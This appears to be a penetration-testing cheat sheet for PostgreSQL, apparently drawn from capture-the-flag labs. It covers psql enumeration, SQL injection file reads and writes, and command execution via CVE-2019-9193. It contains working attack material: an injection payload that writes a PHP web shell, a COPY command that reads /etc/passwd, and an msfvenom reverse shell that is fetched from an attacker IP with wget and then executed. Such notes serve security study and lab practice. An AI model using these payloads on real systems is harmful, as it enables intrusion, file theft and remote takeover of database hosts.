5432 - PostgreSQL

Usage

PostgreSQL stores metadata in tables beggining with pg_.

Version

SELECT version();

Current User

Databases

Tables

Columns

We can connect via CLI with psql.

Connect

psql -h 127.0.0.1 -U postgres

# Listing dbs
postgres=# \l
# Connecting to a db
postgres=# \c cozyhosting
# Listing tables
cozyhosting=# \dt
# Dumping data
cozyhosting=# select * from users;

SQLi

Read/Write

• COPY FROM -> insert data into a table from a file (the PostgreSQL process must have read access to the file and the user making the query permissions to create a new table).

// example using stacked queries
create table tmp(data text); // create the table tmp with one column named data
copy tmp from '/etc/passwd'; // copy the file contents into the tmp table
select * from tmp; // select all data from the tmp table

• COPY TO -> copy data to a file from a table (the PostgreSQL process must have write permissions to the directory where the file will be created).

1';copy(select '<?php passthru($_GET["cmd"]);?>') to '/var/tmp/cmd.php';-- -

• pg_read_file() -> instead of inserting the results into a table, it just returns a single field containing all the data (useful if the PostgreSQL process has read access on the file, but the user querying don't have permissions to create a new table).

SELECT pg_read_file('/var/tmp/proof.txt');

RCE

PostgreSQL 9.3-11.7 has an authenticated RCE vulnerability (CVE-2019-9193) with an available PoC.

# Create a revese shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf
​
# Transfer the file
$ python3 50847.py -i nibbles -p 5437 -U postgres -P postgres -c 'wget 192.168.45.170/revshell.elf -O /tmp/revshell.elf'
​
# Assign execute permissions
$ python3 50847.py -i nibbles -p 5437 -U postgres -P postgres -c 'chmod +x /tmp/revshell.elf'
​
# Execute the file
$ python3 50847.py -i nibbles -p 5437 -U postgres -P postgres -c '/tmp/revshell.elf'